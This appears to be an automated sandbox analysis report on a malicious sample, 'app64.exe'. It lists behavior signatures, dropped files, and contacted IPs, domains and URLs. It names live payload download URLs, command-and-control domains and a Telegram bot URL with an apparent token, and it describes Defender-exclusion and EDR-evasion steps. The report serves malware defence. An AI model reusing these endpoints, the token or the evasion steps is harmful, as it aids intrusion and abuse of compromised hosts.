Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows \System32\printui.exe Code function: 10_2_00007FF67A0E1A54 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter, 10_2_00007FF67A0E1A54
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83AB3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket, 28_2_00007FF8B83AB3F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83B1EA6 calloc,calloc,calloc,bind,WSAGetLastError, 28_2_00007FF8B83B1EA6
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B837EFC0 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons, 28_2_00007FF8B837EFC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83B2130 calloc,calloc,calloc,bind,WSAGetLastError, 28_2_00007FF8B83B2130
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83B1EA6 bind,WSAGetLastError, 34_2_00007FF8B83B1EA6
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B837EFC0 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons, 34_2_00007FF8B837EFC0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83B2130 bind,WSAGetLastError, 34_2_00007FF8B83B2130
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83AB3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket, 34_2_00007FF8B83AB3F0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B8367410 memset,WSAGetLastError,strchr,inet_pton,htons,strtoul,inet_pton,htons,WSAGetLastError,htons,htons,bind,htons,bind,WSAGetLastError, 34_2_00007FF8B8367410
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545289 Sample: app64.exe Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 111 api.telegram.org 2->111 113 rootunvdwl.com 2->113 115 6 other IPs or domains 2->115 129 Malicious sample detected (through community Yara rule) 2->129 131 Multi AV Scanner detection for dropped file 2->131 133 Multi AV Scanner detection for submitted file 2->133 137 14 other signatures 2->137 12 cmd.exe 1 2->12         started        15 svchost.exe 2->15         started        18 app64.exe 2->18         started        20 2 other processes 2->20 signatures3 135 Uses the Telegram API (likely for C&C communication) 111->135 process4 dnsIp5 165 Suspicious powershell command line found 12->165 167 Uses schtasks.exe or at.exe to add and modify task schedules 12->167 169 Adds a directory exclusion to Windows Defender 12->169 22 powershell.exe 14 18 12->22         started        27 conhost.exe 12->27         started        123 rootunvbot.com 188.116.21.204, 49946, 50021, 5432 NEPHAX-ASPL Poland 15->123 125 unvdwl.com 194.26.192.52, 49988, 49991, 49998 HEANETIE Netherlands 15->125 127 3 other IPs or domains 15->127 29 cmd.exe 1 15->29         started        31 cmd.exe 15->31         started        33 cmd.exe 15->33         started        35 cmd.exe 15->35         started        171 Suspicious command line found 18->171 173 Found direct / indirect Syscall (likely to bypass EDR) 18->173 37 cmd.exe 20->37         started        signatures6 process7 dnsIp8 117 github.com 140.82.121.4, 443, 49704, 50011 GITHUBUS United States 22->117 119 raw.githubusercontent.com 185.199.111.133, 443, 49705, 50017 FASTLYUS Netherlands 22->119 99 C:\Users\Public\pyld.dll, PE32+ 22->99 dropped 143 Drops PE files to the user root directory 22->143 145 Drops executables to the windows directory (C:\Windows) and starts them 22->145 147 Found suspicious powershell code related to unpacking or dynamic code loading 22->147 149 Powershell drops PE file 22->149 39 printui.exe 1 15 22->39         started        51 4 other processes 22->51 151 Adds a directory exclusion to Windows Defender 29->151 43 powershell.exe 23 29->43         started        45 conhost.exe 29->45         started        47 powershell.exe 31->47         started        49 conhost.exe 31->49         started        53 2 other processes 33->53 55 2 other processes 35->55 57 2 other processes 37->57 file9 signatures10 process11 file12 101 C:\Windows\System32\zlib1.dll, PE32+ 39->101 dropped 103 C:\Windows\System32\x590769.dat, PE32+ 39->103 dropped 105 C:\Windows\System32\usvcldr64.dat, PE32+ 39->105 dropped 109 10 other files (8 malicious) 39->109 dropped 153 Adds a directory exclusion to Windows Defender 39->153 155 Suspicious command line found 39->155 59 cmd.exe 1 39->59         started        62 cmd.exe 1 39->62         started        64 cmd.exe 39->64         started        69 4 other processes 39->69 157 Loading BitLocker PowerShell Module 43->157 107 C:\Windows \System32\printui.dll (copy), PE32+ 51->107 dropped 66 xcopy.exe 2 51->66         started        signatures13 process14 file15 159 Suspicious powershell command line found 59->159 71 powershell.exe 23 59->71         started        74 conhost.exe 59->74         started        161 Adds a directory exclusion to Windows Defender 62->161 76 powershell.exe 23 62->76         started        78 conhost.exe 62->78         started        163 Drops executables to the windows directory (C:\Windows) and starts them 64->163 80 console_zero.exe 64->80         started        82 conhost.exe 64->82         started        97 C:\Windows \System32\printui.exe, PE32+ 66->97 dropped 84 reg.exe 1 1 69->84         started        86 powershell.exe 69->86         started        89 8 other processes 69->89 signatures16 process17 dnsIp18 139 Loading BitLocker PowerShell Module 71->139 91 cmd.exe 80->91         started        141 Creates a Windows Service pointing to an executable in C:\Windows 84->141 121 api.telegram.org 149.154.167.220, 443, 49885 TELEGRAMRU United Kingdom 86->121 signatures19 process20 process21 93 conhost.exe 91->93         started        95 schtasks.exe 91->95         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
8.8.8.8
 dns.google United States
15169 GOOGLEUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
194.26.192.52
 unvdwl.com Netherlands
1213 HEANETIE false
34.117.59.81
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
140.82.121.4
 github.com United States
36459 GITHUBUS false
188.116.21.204
 rootunvbot.com Poland
43333 NEPHAX-ASPL false
185.199.111.133
 raw.githubusercontent.com Netherlands
54113 FASTLYUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
unvdwl.com 194.26.192.52 true
github.com 140.82.121.4 true
ipinfo.io 34.117.59.81 true
raw.githubusercontent.com 185.199.111.133 true
rootunvbot.com 188.116.21.204 true
api.telegram.org 149.154.167.220 true
dns.google 8.8.8.8 true
rootunvdwl.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://dns.google/resolve?name=rootunvdwl.com false
    		unknown
    https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dat false
      		unknown
      https://ipinfo.io/json false
        		unknown
        https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage false
          		unknown
          https://dns.google/resolve?name=unvdwl.com false
            		unknown
            https://github.com/unvd01/unvmain/raw/main/un2/botprnt.dat false
              		unknown